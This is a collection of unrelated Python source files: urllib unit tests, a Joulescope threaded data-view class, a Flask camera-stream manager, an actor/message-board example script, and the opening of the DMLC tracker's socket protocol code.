        given = {"key name": "A bunch of pluses"}
        expect = "key+name=A+bunch+of+pluses"
        result = urllib.urlencode(given)
        self.assertEqual(expect, result)

    def test_doseq(self):
        # Test that passing True for 'doseq' parameter works correctly
        given = {'sequence': ['1', '2', '3']}
        # without doseq, the whole list is stringified and quoted as one value
        expect = "sequence=%s" % urllib.quote_plus(str(['1', '2', '3']))
        result = urllib.urlencode(given)
        self.assertEqual(expect, result)
        # with doseq, each element becomes its own key=value pair
        result = urllib.urlencode(given, True)
        for value in given["sequence"]:
            expect = "sequence=%s" % value
            self.assert_(expect in result,
                         "%s not found in %s" % (expect, result))
        self.assertEqual(result.count('&'), 2,
                         "Expected 2 '&'s, got %s" % result.count('&'))
class Pathname_Tests(unittest.TestCase):
    """Test pathname2url() and url2pathname()"""

    def test_basic(self):
        # Make sure simple tests pass
        expected_path = os.path.join("parts", "of", "a", "path")
        expected_url = "parts/of/a/path"
        result = urllib.pathname2url(expected_path)
        self.assertEqual(expected_url, result,
                         "pathname2url() failed; %s != %s" %
                         (result, expected_url))
        result = urllib.url2pathname(expected_url)
        # (sic: "url2pathame" typo is in the original runtime message)
        self.assertEqual(expected_path, result,
                         "url2pathame() failed; %s != %s" %
                         (result, expected_path))

    def test_quoting(self):
        # Test automatic quoting and unquoting works for pathnam2url() and
        # url2pathname() respectively
        given = os.path.join("needs", "quot=ing", "here")
        expect = "needs/%s/here" % urllib.quote("quot=ing")
        result = urllib.pathname2url(given)
        self.assertEqual(expect, result,
                         "pathname2url() failed; %s != %s" %
                         (expect, result))
        # round-trip: unquoting the quoted URL restores the original path
        expect = given
        result = urllib.url2pathname(result)
        self.assertEqual(expect, result,
                         "url2pathname() failed; %s != %s" %
                         (expect, result))
        given = os.path.join("make sure", "using_quote")
        expect = "%s/using_quote" % urllib.quote("make sure")
        result = urllib.pathname2url(given)
        self.assertEqual(expect, result,
                         "pathname2url() failed; %s != %s" %
                         (expect, result))
        # '+' must NOT be treated as a space by url2pathname (uses unquote,
        # not unquote_plus)
        given = "make+sure/using_unquote"
        expect = os.path.join("make+sure", "using_unquote")
        result = urllib.url2pathname(given)
        self.assertEqual(expect, result,
                         "url2pathname() failed; %s != %s" %
                         (expect, result))
class URLopener_Tests(unittest.TestCase):
    """Testcase to test the open method of URLopener class."""

    def test_quoted_open(self):
        """open() must percent-quote the URL before dispatching by scheme."""
        class SpamOpener(urllib.URLopener):
            # echo back whatever open() forwards for the 'spam' scheme
            def open_spam(self, url):
                return url

        opener = SpamOpener()
        self.assertEqual(opener.open('spam://example/ /'),
                         '//example/%20/')
# Just commented them out.
# Can't really tell why they keep failing on Windows and SPARC.
# Everywhere else they work ok, but on those machines they sometimes
# fail in one of the tests, sometimes in another. I have a Linux box, and
# the tests pass there.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assert_(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assert_(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
def test_main():
    """Run the urllib test suite, silencing the Py3k DeprecationWarning
    that urllib.urlopen emits under -3."""
    import warnings
    with warnings.catch_warnings():
        warnings.filterwarnings('ignore', ".*urllib\.urlopen.*Python 3.0",
                                DeprecationWarning)
        test_support.run_unittest(
            urlopen_FileTests,
            urlopen_HttpTests,
            urlretrieve_FileTests,
            ProxyTests,
            QuotingTests,
            UnquotingTests,
            urlencode_Tests,
            Pathname_Tests,
            URLopener_Tests,
            #FTPWrapperTests,
        )
# Standard script entry point: run the suite when executed directly.
if __name__ == '__main__':
    test_main()
|
view.py | # Copyright 2018-2019 Jetperch LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from joulescope import span
from joulescope.stream_buffer import StreamBuffer, stats_to_api, \
stats_array_factory, stats_array_invalidate
import threading
import queue
import numpy as np
import logging
TIMEOUT = 10.0
def data_array_to_update(x_limits, x, data_array):
    """Convert raw data buffer to a view update.

    :param x_limits: The list of [x_min, x_max] or None if unknown.
    :param x: The np.ndarray of x-axis times.
    :param data_array: The np.ndarray((N, STATS_FIELD_COUNT), dtype=STATS_DTYPE)
        structured array with fields 'mean', 'variance', 'length', 'min', 'max'
        (per the field accesses below).
    :return: The statistics dict produced by stats_to_api, augmented with
        per-signal time-series arrays.
    """
    if len(x):
        # seed the dict from the first decimated sample and the time extent
        s = stats_to_api(data_array[0, :], float(x[0]), float(x[-1]))
    else:
        s = stats_to_api(None, 0.0, 0.0)
    s['time']['x'] = {'value': x, 'units': 's'}
    s['time']['limits'] = {'value': x_limits, 'units': 's'}
    s['state'] = {'source_type': 'buffer'}  # ['realtime', 'buffer']
    # assumes stats_to_api orders s['signals'] to match data_array's column
    # order -- TODO confirm against stream_buffer.stats_to_api
    for idx, signal in enumerate(s['signals'].values()):
        signal['µ']['value'] = data_array[:, idx]['mean'].copy()
        # clamp sample counts below 1 to avoid divide-by-zero in the
        # variance normalization that follows
        length = data_array[:, idx]['length'] - 1
        length[length < 1] = 1.0
        signal['σ2']['value'] = data_array[:, idx]['variance'] / length
        signal['min']['value'] = data_array[:, idx]['min'].copy()
        signal['max']['value'] = data_array[:, idx]['max'].copy()
        signal['p2p']['value'] = signal['max']['value'] - signal['min']['value']
    return s
class View:
    """Threaded, decimated view over a StreamBuffer.

    All buffer access runs on a dedicated worker thread; the public methods
    post commands to that thread through a queue and optionally block for
    the response.
    """

    def __init__(self, stream_buffer, calibration):
        """Create a new view instance.

        :param stream_buffer: The stream buffer providing the data, or None.
        :param calibration: The device calibration data structure.
        """
        self._state = 'idle'
        self._stream_buffer = None
        self._calibration = calibration
        self._x = None
        self._data = None  # [N, STATS_FIELD_COUNT]
        self._x_range = [0.0, 1.0]  # the initial default range
        self._samples_per = 1
        self._data_idx = 0
        self._span = None
        self._changed = True
        self._stream_notify_available = False  # flag when stream_notify called
        self._refresh_requested = False
        self._log = logging.getLogger(__name__)
        self._thread = None
        self._closing = False
        self._cmd_queue = queue.Queue()  # tuples of (command, args, callback)
        self._response_queue = queue.Queue()
        self.on_update_fn = None  # callable(data)
        self._quit = False
        self.on_close = None  # optional callable() on close
        if stream_buffer is not None:
            self._stream_buffer_assign(stream_buffer)

    def _stream_buffer_assign(self, stream_buffer):
        """Attach a stream buffer and (re)build the time span."""
        if self._stream_buffer == stream_buffer:
            return
        self._stream_buffer = stream_buffer
        self._x_range = list(self._stream_buffer.limits_time)  # the initial default range
        length = len(self)
        if length <= 0:
            length = 100
        # todo : investigate - may want inclusive max time (not exclusive) -- off by 1 error?
        self._span = span.Span(limits=self._stream_buffer.limits_time,
                               quant=1.0 / self.sampling_frequency,
                               length=length)

    def __len__(self):
        """The number of decimated samples currently held by the view."""
        if self._data is None:
            return 0
        return self._data.shape[0]

    @property
    def sampling_frequency(self):
        """The output sampling frequency."""
        if self._stream_buffer is None:
            return None
        return self._stream_buffer.output_sampling_frequency

    @property
    def calibration(self):
        """The device calibration."""
        return self._calibration

    @property
    def limits(self):
        """Get the (x_min, x_max) limits for the view."""
        if self._span is not None:
            return list(self._span.limits)
        return None

    def _cmd_process(self, cmd, args):
        """Dispatch one queued command on the view thread; return its result."""
        rv = None
        try:
            # self._log.debug('_cmd_process %s - start', cmd)
            if cmd == 'stream_notify':
                rv = self._stream_notify(stream_buffer=args)
            elif cmd == 'refresh':
                if bool(args['force']):
                    self._log.debug('view refresh(force=True) requested')
                    self._update()
                else:
                    self._refresh_requested = True
            elif cmd == 'on_x_change':
                rv = self._on_x_change(*args)
            elif cmd == 'samples_get':
                rv = self._samples_get(**args)
            elif cmd == 'statistics_get':
                rv = self._statistics_get(**args)
            elif cmd == 'statistics_get_multiple':
                rv = self._statistics_get_multiple(**args)
            elif cmd == 'start':
                rv = self._start()
            elif cmd == 'stop':
                rv = self._stop()
            elif cmd == 'ping':
                return args
            elif cmd == 'close':
                self._quit = True
            else:
                self._log.warning('unsupported command %s', cmd)
        except Exception:
            # fix: was a bare "except:"; narrowed so KeyboardInterrupt and
            # SystemExit still propagate out of the worker thread
            self._log.exception('While running command')
        # self._log.debug('_cmd_process %s - done', cmd)
        return rv

    def _run(self):
        """Worker-thread main loop: process commands, coalesce refreshes."""
        cmd_count = 0
        timeout = 1.0
        self._log.info('View.run start')
        while not self._quit:
            try:
                cmd, args, cbk = self._cmd_queue.get(timeout=timeout)
            except queue.Empty:
                timeout = 1.0
                # queue drained: apply any deferred refresh now
                if cmd_count and self._refresh_requested and (self._changed or self._stream_notify_available):
                    self._update()
                cmd_count = 0
                continue
            except Exception:
                self._log.exception('Exception during View _cmd_queue get')
                continue
            cmd_count += 1
            timeout = 0.0
            rv = self._cmd_process(cmd, args)
            if callable(cbk):
                try:
                    cbk(rv)
                except Exception:
                    # fix: was a bare "except:" (see _cmd_process)
                    self._log.exception('in callback')
        self._data = None
        self._log.info('View.run done')

    def _post(self, command, args=None, cbk=None):
        """Queue a command for the view thread (non-blocking)."""
        if self._thread is None:
            self._log.info('View._post(%s) when thread not running', command)
        else:
            self._cmd_queue.put((command, args, cbk))

    def _post_block(self, command, args=None, timeout=None):
        """Queue a command and block until the view thread responds.

        :raise IOError: if the thread is not running, hung, or the
            command produced an exception.
        """
        timeout = TIMEOUT if timeout is None else float(timeout)
        # self._log.debug('_post_block %s start', command)
        while not self._response_queue.empty():
            # drain any stale responses from a previously timed-out command
            self._log.warning('response queue not empty')
            try:
                self._response_queue.get(timeout=0.0)
            except queue.Empty:
                pass
        if self._thread is None:
            raise IOError('View thread not running')
        self._post(command, args, lambda rv_=None: self._response_queue.put(rv_))
        try:
            rv = self._response_queue.get(timeout=timeout)
        except queue.Empty as ex:
            self._log.error('view thread hung: %s - FORCE CLOSE', command)
            self._join()
            rv = ex
        except Exception as ex:
            rv = ex
        if isinstance(rv, Exception):
            raise IOError(rv)
        # self._log.debug('_post_block %s done', command)  # rv
        return rv

    def _update_from_buffer(self):
        """Refresh self._data from the stream buffer (full or incremental)."""
        buffer = self._stream_buffer
        if buffer is None:
            return
        length = len(self)
        data_idx_view_end, sample_id_end, delta = self._view()
        if self._data is None:
            return
        elif not self._changed and 0 == delta:
            return  # nothing new
        elif self._changed or delta >= length:  # perform full recompute
            stats_array_invalidate(self._data)
            if data_idx_view_end > 0:
                start_idx = (data_idx_view_end - length) * self._samples_per
                # self.log.debug('recompute(start=%s, stop=%s, increment=%s)', start_idx, sample_id_end, self.samples_per)
                buffer.data_get(start_idx, sample_id_end, self._samples_per, self._data)
        elif data_idx_view_end > 0:
            # incremental: shift left by delta and fill only the tail
            start_idx = self._data_idx * self._samples_per
            # self.log.debug('update(start=%s, stop=%s, increment=%s)', start_idx, sample_id_end, self.samples_per)
            self._data = np.roll(self._data, -delta, axis=0)
            buffer.data_get(start_idx, sample_id_end, self._samples_per, self._data[-delta:, :])
        else:
            stats_array_invalidate(self._data)
        self._data_idx = data_idx_view_end
        self._changed = False

    def _update(self):
        """Push the current view data to on_update_fn, if registered."""
        if not callable(self.on_update_fn):
            return
        self._update_from_buffer()
        if self._data is None:
            data = None
        else:
            data = data_array_to_update(self.limits, self._x, self._data)
            if self._state != 'idle':
                data['state']['source_type'] = 'realtime'
        self._stream_notify_available = False
        self._refresh_requested = False
        try:
            self.on_update_fn(data)
        except Exception:
            self._log.exception('in on_update_fn')

    def _clear(self):
        """Invalidate the view data and request a refresh."""
        self._changed = True
        self._refresh_requested = True
        self._data_idx = 0
        if self._data is not None:
            stats_array_invalidate(self._data)

    def _start(self):
        self._log.debug('start')
        self._clear()
        self._state = 'streaming'

    def _stop(self):
        # fix: logged 'start' (copy-paste from _start)
        self._log.debug('stop')
        self._state = 'idle'

    def _on_x_change(self, cmd, kwargs):
        """Handle an x-axis change command; see on_x_change for the cmds."""
        x_range = list(self._x_range)  # copy
        if cmd == 'resize':  # {pixels: int}
            length = kwargs['pixels']
            if length is not None and length != len(self):
                self._log.info('resize %s', length)
                self._span.length = length
                self._data = stats_array_factory(length)
                self._changed = True  # invalidate
            x_range, self._samples_per, self._x = self._span.conform_discrete(x_range)
        elif cmd == 'span_absolute':  # {range: (start: float, stop: float)}]
            x_range, self._samples_per, self._x = self._span.conform_discrete(kwargs.get('range'))
        elif cmd == 'span_relative':  # {center: float, gain: float}]
            x_range, self._samples_per, self._x = self._span.conform_discrete(
                x_range, gain=kwargs.get('gain'), pivot=kwargs.get('pivot'))
        elif cmd == 'span_pan':
            delta = kwargs.get('delta', 0.0)
            x_range = [x_range[0] + delta, x_range[-1] + delta]
            x_range, self._samples_per, self._x = self._span.conform_discrete(x_range)
        elif cmd == 'refresh':
            self._log.warning('on_x_change(refresh)')
            self._changed = True
            return
        else:
            self._log.warning('on_x_change(%s) unsupported', cmd)
            return

        if self._state == 'streaming':
            # while streaming, keep the right edge pinned to the newest data
            x_max = self._span.limits[1]
            if x_range[1] < x_max:
                x_shift = x_max - x_range[1]
                x_range = [x_range[0] + x_shift, x_max]
                x_range, self._samples_per, self._x = self._span.conform_discrete(x_range)

        # NOTE: _clear() always sets _changed, so this |= is effectively moot
        self._changed |= (self._x_range != x_range)
        self._clear()
        self._x_range = x_range
        self._log.info('changed=%s, length=%s, span=%s, range=%s, samples_per=%s',
                       self._changed, len(self), self._x_range,
                       self._x_range[1] - self._x_range[0], self._samples_per)
        if self._state == 'idle':
            self._stream_notify(self._stream_buffer)

    def _view(self):
        """Compute (data_idx_view_end, sample_id_end, delta) for the window."""
        buffer = self._stream_buffer
        _, sample_id_end = buffer.sample_id_range
        lag_time = self._span.limits[1] - self._x_range[1]
        lag_samples = int(lag_time * self.sampling_frequency) // self._samples_per
        data_idx_stream_end = sample_id_end // self._samples_per
        data_idx_view_end = data_idx_stream_end - lag_samples
        sample_id_end = data_idx_view_end * self._samples_per
        delta = data_idx_view_end - self._data_idx
        return data_idx_view_end, sample_id_end, delta

    def time_to_sample_id(self, t):
        return self._stream_buffer.time_to_sample_id(t)

    def sample_id_to_time(self, s):
        return self._stream_buffer.sample_id_to_time(s)

    def _stream_notify(self, stream_buffer):
        self._stream_buffer = stream_buffer
        self._stream_notify_available = True

    def _convert_time_to_samples(self, x, units):
        """Convert a time value in the given units to a sample index."""
        if units is None or units == 'seconds':
            return self.time_to_sample_id(x)
        elif units == 'samples':
            return int(x)
        else:
            raise ValueError(f'unsupported units {units}')

    def _convert_time_range_to_samples(self, start, stop, units):
        """Convert a [start, stop) range to sample indices, defaulting to the
        current view window when either endpoint is None (seconds only)."""
        length = len(self)
        data_idx_view_end, sample_id_end, delta = self._view()
        start_idx = (data_idx_view_end - length) * self._samples_per
        if start is None and units == 'seconds':
            start = start_idx
        else:
            start = self._convert_time_to_samples(start, units)
        if stop is None and units == 'seconds':
            stop = data_idx_view_end * self._samples_per
        else:
            stop = self._convert_time_to_samples(stop, units)
        return start, stop

    def _samples_get(self, start=None, stop=None, units=None, fields=None):
        s1, s2 = self._convert_time_range_to_samples(start, stop, units)
        self._log.debug('_samples_get(start=%r, stop=%r, units=%s) -> %s, %s', start, stop, units, s1, s2)
        return self._stream_buffer.samples_get(start=s1, stop=s2, fields=fields)

    def _statistics_get(self, start=None, stop=None, units=None):
        """Get the statistics for the collected sample data over a time range.

        :return: The statistics data structure.
            See the :`statistics documentation <statistics.html>`_
            for details on the data format.
        """
        s1, s2 = self._convert_time_range_to_samples(start, stop, units)
        # self._log.debug('buffer %s, %s, %s => %s, %s', start, stop, units, s1, s2)
        d, x_range = self._stream_buffer.statistics_get(start=s1, stop=s2)
        t_start = x_range[0] / self.sampling_frequency
        t_stop = x_range[1] / self.sampling_frequency
        return stats_to_api(d, t_start, t_stop)

    def _statistics_get_multiple(self, ranges, units=None, source_id=None):
        return [self._statistics_get(x[0], x[1], units=units) for x in ranges]

    def open(self):
        """Open the view and run the thread."""
        self.close()
        self._log.info('open')
        self._closing = False
        self._thread = threading.Thread(name='view', target=self._run)
        self._thread.start()
        self._post_block('ping')  # ensure the thread is responsive
        return

    def start(self, stream_buffer: 'StreamBuffer'):
        """Start streaming."""
        # annotation quoted (forward reference) so this class imports even
        # when StreamBuffer is unavailable; semantics unchanged
        self._post_block('start')

    def stop(self):
        """Stop streaming."""
        if self._thread is not None:
            self._post_block('stop')

    def _join(self, timeout=None):
        """Request thread shutdown and wait for it to exit."""
        timeout = TIMEOUT if timeout is None else timeout
        if not self._closing:
            self._closing = True
            self._post('close', None, None)
        if self._thread:
            # thread can safely join() multiple times
            self._thread.join(timeout=timeout)
            self._thread = None

    def close(self):
        """Close the view and stop the thread."""
        if self._thread is not None:
            self._log.info('close')
            self._join()
            on_close, self.on_close = self.on_close, None
            if callable(on_close):
                try:
                    on_close()
                except Exception:
                    self._log.exception('view.on_close')
            self._stream_buffer = None

    def refresh(self, force=None):
        """Request a view update (deferred unless force is truthy)."""
        return self._post('refresh', {'force': force})

    def on_x_change(self, cmd, kwargs):
        """Post an x-axis change: 'resize', 'span_absolute', 'span_relative',
        'span_pan', or 'refresh'."""
        self._post('on_x_change', (cmd, kwargs))

    def stream_notify(self, stream_buffer):
        """Notify the view that new stream data is available."""
        self._post('stream_notify', stream_buffer)

    def samples_get(self, start=None, stop=None, units=None, fields=None):
        """Get exact samples over a range.

        :param start: The starting time.
        :param stop: The ending time.
        :param units: The units for start and stop.
            'seconds' or None is in floating point seconds relative to the view.
            'samples' is in stream buffer sample indicies.
        :param fields: The fields to get.  None (default) gets the fundamental
            fields available for this view instance, which may vary depending
            upon the backend.
        """
        args = {'start': start, 'stop': stop, 'units': units, 'fields': fields}
        return self._post_block('samples_get', args)

    def statistics_get(self, start=None, stop=None, units=None, callback=None):
        """Get statistics over a range.

        :param start: The starting time.
        :param stop: The ending time.
        :param units: The units for start and stop.
            'seconds' or None is in floating point seconds relative to the view.
            'samples' is in stream buffer sample indices.
        :param callback: The optional callable.  When provided, this method will
            not block and the callable will be called with the statistics
            data structure from the view thread.
        :return: The statistics data structure or None if callback is provided.

        Note: this same format is used by the
        :meth:`Driver.statistics_callback_register`.
        See the `statistics documentation <statistics.html>`_
        for details on the data format.
        """
        args = {'start': start, 'stop': stop, 'units': units}
        if callback is None:
            return self._post_block('statistics_get', args)
        else:
            self._post('statistics_get', args=args, cbk=callback)
            return None

    def statistics_get_multiple(self, ranges, units=None, callback=None, source_id=None):
        """Get statistics over multiple ranges; see statistics_get."""
        args = {'ranges': ranges, 'units': units, 'source_id': source_id}
        if callback is None:
            return self._post_block('statistics_get_multiple', args)
        else:
            self._post('statistics_get_multiple', args=args, cbk=callback)
            return None

    def ping(self, *args, **kwargs):
        """Ping the thread.

        :param args: The positional arguments.
        :param kwargs: The keyword arguments.
        :return: (args, kwargs) after passing through the thread.
        """
        return self._post_block('ping', (args, kwargs))
|
videoManager.py | from flask import Response, request, abort
from _thread import get_ident
from .setting import serverConfig, streamConfig
from .tokenManager import Auth
from camera_dev import CameraDevice
import cv2, threading, time
class LiveVideo:
    """Shared camera capture: one background thread reads JPEG frames and
    fans them out to any number of streaming clients via per-thread Events."""

    # static placeholder frame shown before the camera delivers data or on error
    placeholder = cv2.imencode('.jpg',
                               cv2.resize(cv2.imread(streamConfig.PLACEHOLDER),
                                          (CameraDevice.WIDTH, CameraDevice.HEIGHT),
                                          interpolation=cv2.INTER_AREA))[1].tobytes()
    thread = None        # capture thread, None when stopped
    frame = None         # latest encoded JPEG bytes
    frameId = 0          # 1 = good frame, -1 = capture error, 0 = idle
    lastTime = 0         # last client access time (for idle shutdown)
    lock = threading.Lock()
    signal = dict()      # client thread ident -> [Event, last-signal time]

    @classmethod
    def StartThread(cls):
        """Start the capture thread if not already running (thread-safe)."""
        with cls.lock:
            if cls.thread is None:
                cls.lastTime = time.time()
                cls.thread = threading.Thread(target=cls.CaptureTask)
                cls.thread.start()
                cls.EventWait()
                cls.EventClear()

    @classmethod
    def GetFrame(cls):
        """Block until the next frame; return the placeholder on errors."""
        cls.lastTime = time.time()
        cls.EventWait()
        cls.EventClear()
        if cls.frameId == -1:
            return cls.placeholder
        else:
            return cls.frame

    @classmethod
    def CaptureTask(cls):
        """Capture loop: read, flip, encode; stop after idle TIMEOUT."""
        while True:
            try:
                ret, img = CameraDevice.device.read()
                img = cv2.flip(img, 0)
                cls.frame = cv2.imencode('.jpg', img, [cv2.IMWRITE_JPEG_QUALITY, streamConfig.QUALITY])[1].tobytes()
                cls.frameId = 1
            except Exception:
                # fix: was a bare "except:"; keep best-effort behavior but do
                # not swallow SystemExit/KeyboardInterrupt
                cls.frameId = -1
            finally:
                cls.EventSet()
            time.sleep(0.04)
            if streamConfig.TIMEOUT > 0 and time.time() - cls.lastTime > streamConfig.TIMEOUT:
                cls.frame = None
                cls.frameId = 0
                cls.thread = None
                break

    @classmethod
    def EventSet(cls):
        """Wake all waiting clients; drop clients stale past THREAD_TIMEOUT.

        Fixes vs. original: iterate over a snapshot (EventWait() can add
        entries from other threads mid-iteration -> RuntimeError), remove
        ALL stale entries instead of only the last one seen, and use the
        non-deprecated Event.is_set().
        """
        nowTime = time.time()
        stale = []
        for ident, ev in list(cls.signal.items()):
            if not ev[0].is_set():
                ev[0].set()
                ev[1] = nowTime
            elif nowTime - ev[1] > streamConfig.THREAD_TIMEOUT:
                stale.append(ident)
        for ident in stale:
            cls.signal.pop(ident, None)

    @classmethod
    def EventWait(cls):
        """Register the calling thread (if new) and wait for the next frame."""
        ident = get_ident()
        if ident not in cls.signal:
            cls.signal[ident] = [threading.Event(), time.time()]
        cls.signal[ident][0].wait()

    @classmethod
    def EventClear(cls):
        """Reset the calling thread's event so the next wait blocks."""
        cls.signal[get_ident()][0].clear()
def GenVideo():
    """Generator yielding multipart-JPEG parts: two placeholder frames first,
    then live frames forever."""
    prefix = b'--frame\r\nContent-Type: image/jpeg\r\n\r\n'
    # prime the stream with the placeholder so clients render immediately
    yield prefix + LiveVideo.placeholder + b'\r\n'
    yield prefix + LiveVideo.placeholder + b'\r\n'
    if LiveVideo.thread is None:
        LiveVideo.StartThread()
    while True:
        yield prefix + LiveVideo.GetFrame() + b'\r\n'
def Stream():
    """Flask endpoint: serve the MJPEG stream to authorized admins only."""
    streamHeaders = list(serverConfig.DEFAULT_RESPONSE_HEADER.items())
    if not Auth([serverConfig.ADMIN_ID]):
        abort(403)
    return Response(GenVideo(),
                    mimetype='multipart/x-mixed-replace;boundary=frame',
                    headers=streamHeaders)
main-state-example.py | from message_board import MSGBoard
from node import Actor
def determin_method(get_actor, get_info):
    """Route an info request through the actor.

    NOTE(review): the original line was truncated mid-comparison
    ("... == <nothing>"), a SyntaxError. Reconstructed to return the
    quick-info request result; confirm the intended comparison target.

    :param get_actor: The actor to query.
    :param get_info: The kind of info requested ('quick' is handled).
    :return: The actor's response for 'quick', else None.
    """
    if get_info == 'quick':
        return get_actor.create_message(request='get_quick_info')
    return None
def foo(bar, baz, nay):
    """Return the sum of the three arguments (left-associative ``+``)."""
    total = bar + baz
    total = total + nay
    return total
def bar():
    """Constant producer: 3."""
    return 3

def baz():
    """Constant producer: 30."""
    return 30

def kay():
    """Constant producer: 300."""
    return 300

def jay():
    """Constant producer: 3000."""
    return 3000

def nay(kay, jay):
    """Sum two values (presumably fed the kay()/jay() results by the actor
    framework -- confirm against Actor.add_functions wiring)."""
    return kay + jay
def show(foo):
    """Print *foo* and report success to the caller."""
    print(foo)
    return True
def shutdown():
    """Print a notice and terminate the interpreter via SystemExit.

    Fix: removed the unreachable ``exit()`` call that followed
    ``sys.exit()`` -- control never reaches it.
    """
    import sys
    print('shutting down')
    sys.exit()
def get_actor():
    """Return the caller's ``self`` local (the actor invoking this function).

    :raise KeyError: if the calling frame has no ``self`` local.
    """
    import inspect  # fix: inspect was never imported at file level (NameError)
    frame_infos = inspect.stack()   # A list of FrameInfo.
    frame = frame_infos[1].frame    # The frame of the caller.
    locs = frame.f_locals           # The caller's locals dict.
    return locs['self']
def change_msg_board(get_actor, get_second_msg_board):
    """Switch the actor's active message board to the second board."""
    get_actor.set_messageboard(get_second_msg_board.name)

def get_second_msg_board(get_actor):
    """Return the actor's second registered message board.

    Raises IndexError if the actor is listening to fewer than two boards.
    """
    return get_actor.msgboards[1]

def print_something(get_second_msg_board):
    """Print the board's name and pass the board through."""
    print(get_second_msg_board.name)
    return get_second_msg_board
# def user_input():
# import threading
# import time
# import sys
#
# def background():
# while True:
# time.sleep(3)
# print('disarm me by typing disarm')
#
#
# def show_trigger():
# .msgboards.append(msgboard)
#
# new_id = thoughts.produce_id()
# message = {'id': new_id, 'ref_id': new_id, 'request': 'show'}
# actor_user.say(message, thoughts)
#
# # now threading1 runs regardless of user input
# threading1 = threading.Thread(target=background)
# threading1.daemon = True
# threading1.start()
#
# while True:
# if input() == 'disarm':
# show_trigger()
# sys.exit()
# else:
# print('not disarmed')
# these function details could be deduced from their signature instead of made explicit...
# Script setup: three actors share the 'thoughts' board; each actor is given
# the functions it may execute, and a trigger wires 'show' to 'foo'.
actor_foo = Actor(verbose=True)
actor_kay = Actor(verbose=True)
actor_user = Actor(accepts_user_input=True, verbose=True)
thoughts = MSGBoard('thoughts')
words = MSGBoard('words')  # NOTE(review): created but never attached below
actor_foo.listen(thoughts)
actor_kay.listen(thoughts)
actor_user.listen(thoughts)
actor_user.add_functions(functions=[show, shutdown])
actor_foo.add_functions(functions=[foo, baz, shutdown])
actor_kay.add_functions(functions=[bar, kay, jay, nay, shutdown])
actor_foo.add_trigger(cause='show', effect='foo')
|
tracker.py | """
Tracker script for DMLC
Implements the tracker control protocol
- start dmlc jobs
- start ps scheduler and rabit tracker
- help nodes to establish links with each other
Tianqi Chen
"""
# pylint: disable=invalid-name, missing-docstring, too-many-arguments, too-many-locals
# pylint: disable=too-many-branches, too-many-statements
from __future__ import absolute_import
import os
import sys
import socket
import struct
import subprocess
import argparse
import time
import logging
from threading import Thread
class ExSocket(object):
    """
    Extension of socket to handle recv and send of special data

    Ints are exchanged as native 4-byte values ('@i'); strings are sent as
    a length prefix followed by the encoded bytes.
    """

    def __init__(self, sock):
        self.sock = sock

    def recvall(self, nbytes):
        """Receive exactly *nbytes* bytes.

        :raise EOFError: if the peer closes the connection early.  (Fix: the
            original looped forever on the empty chunks a closed socket
            returns.)
        """
        res = []
        nread = 0
        while nread < nbytes:
            chunk = self.sock.recv(min(nbytes - nread, 1024))
            if not chunk:
                raise EOFError(
                    'socket closed with %d of %d bytes read' % (nread, nbytes))
            nread += len(chunk)
            res.append(chunk)
        return b''.join(res)

    def recvint(self):
        """Receive one native-endian 4-byte signed int."""
        return struct.unpack('@i', self.recvall(4))[0]

    def sendint(self, n):
        """Send one native-endian 4-byte signed int."""
        self.sock.sendall(struct.pack('@i', n))

    def sendstr(self, s):
        """Send a length-prefixed UTF-8 string."""
        self.sendint(len(s))
        self.sock.sendall(s.encode())

    def recvstr(self):
        """Receive a length-prefixed UTF-8 string."""
        slen = self.recvint()
        return self.recvall(slen).decode()
# magic number used to verify existence of data
kMagic = 0xff99

def get_some_ip(host):
    """Resolve *host* to its first address string via getaddrinfo."""
    return socket.getaddrinfo(host, None)[0][4][0]

def get_family(addr):
    """Return the socket address family (AF_*) of *addr*'s first resolution."""
    return socket.getaddrinfo(addr, None)[0][0]
class SlaveEntry(object):
    """One connected worker: performs the magic handshake on construction
    and negotiates link setup in assign_rank()."""

    def __init__(self, sock, s_addr):
        slave = ExSocket(sock)
        self.sock = slave
        self.host = get_some_ip(s_addr[0])
        # handshake: exchange magic numbers to verify the peer speaks the
        # tracker protocol
        magic = slave.recvint()
        assert magic == kMagic, 'invalid magic number=%d from %s' % (magic, self.host)
        slave.sendint(kMagic)
        self.rank = slave.recvint()         # -1 when the worker wants a rank assigned
        self.world_size = slave.recvint()
        self.jobid = slave.recvstr()
        self.cmd = slave.recvstr()          # 'start' | 'recover' | 'print' | 'shutdown'
        self.wait_accept = 0
